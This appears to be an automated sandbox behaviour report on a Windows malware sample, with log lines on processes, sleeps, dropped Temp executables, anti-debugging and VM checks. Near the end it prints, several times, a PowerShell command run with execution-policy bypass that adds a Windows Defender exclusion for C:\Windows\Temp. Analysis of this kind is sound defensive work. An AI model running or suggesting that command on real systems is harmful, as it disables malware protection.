Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: 1870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory allocated: 31F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory allocated: 51F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 4C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 49A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2787	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4834
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4968
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 531
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6634	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7400
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 473
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8193
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 426
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5925
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 846

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_26-68559

Source: C:\Windows\Temp\ochicikt.z2z.exe	API coverage: 2.2 %
Source: C:\Windows\Temp\inyligbs.qlq.exe	API coverage: 2.2 %
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	API coverage: 2.1 %

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1748	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1696	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 2787 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7388	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344	Thread sleep count: 4834 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304	Thread sleep count: 227 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7472	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep count: 4968 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7608	Thread sleep count: 531 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep count: 6634 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7924	Thread sleep count: 314 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep count: 8193 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4348	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 426 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5052	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764	Thread sleep count: 5925 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7388	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1196	Thread sleep count: 846 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6836	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218CB500 FindClose,FindFirstFileExW,GetLastError,	26_2_00007FF6218CB500
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218CB5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	26_2_00007FF6218CB5B0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AFB500 FindClose,FindFirstFileExW,GetLastError,GetCurrentDirectoryW,GetLastError,	27_2_00007FF741AFB500
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AFB5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,GetLastError,GetFileAttributesW,__std_fs_open_handle,CloseHandle,	27_2_00007FF741AFB5B0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A76DB0 FindFirstFileW,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	27_2_00007FF741A76DB0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE96DB0 FindFirstFileW,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	28_2_00007FF7CEE96DB0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF1B5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,GetLastError,GetFileAttributesW,__std_fs_open_handle,CloseHandle,	28_2_00007FF7CEF1B5B0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF1B500 FindClose,FindFirstFileExW,GetLastError,GetCurrentDirectoryW,GetLastError,	28_2_00007FF7CEF1B500
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ADB5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,GetLastError,GetFileAttributesW,__std_fs_open_handle,CloseHandle,	29_2_00007FF786ADB5B0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A56DB0 FindFirstFileW,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	29_2_00007FF786A56DB0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ADB500 FindClose,FindFirstFileExW,GetLastError,GetCurrentDirectoryW,GetLastError,	29_2_00007FF786ADB500

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218973F0 GetLogicalDriveStringsW,_invalid_parameter_noinfo_noreturn,

26_2_00007FF6218973F0

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218A9038 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

26_2_00007FF6218A9038

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\migration\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\replacementmanifests\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\migration\wtr\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\replacementmanifests\hwvid-migration-2\

Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1935326836.00000220D6B49000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6B49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:
Source: rundll32.exe, 00000005.00000002.1966023562.00000000034A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1935326836.00000220D6B49000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6AC9000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6B49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

API call chain: ExitProcess graph end node

graph_26-68470

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF62189A430 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,_invalid_parameter_noinfo_noreturn,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,

26_2_00007FF62189A430

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218BF2B8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

26_2_00007FF6218BF2B8

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218CD804 GetLastError,IsDebuggerPresent,OutputDebugStringW,

26_2_00007FF6218CD804

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

26_2_00007FF62184D570

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218B9EEC GetProcessHeap,

26_2_00007FF6218B9EEC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\ochicikt.z2z.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\inyligbs.qlq.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Process token adjusted: Debug

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218BF2B8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF6218BF2B8
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218BF498 SetUnhandledExceptionFilter,	26_2_00007FF6218BF498
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218BEC08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF6218BEC08
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A7F68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF6218A7F68
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AEEC08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00007FF741AEEC08
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AD7F68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00007FF741AD7F68
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEF7F68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_00007FF7CEEF7F68
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF0EC08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_00007FF7CEF0EC08
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AB7F68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_00007FF786AB7F68
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ACEC08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_00007FF786ACEC08

Source: C:\Windows\System32\loaddll32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior

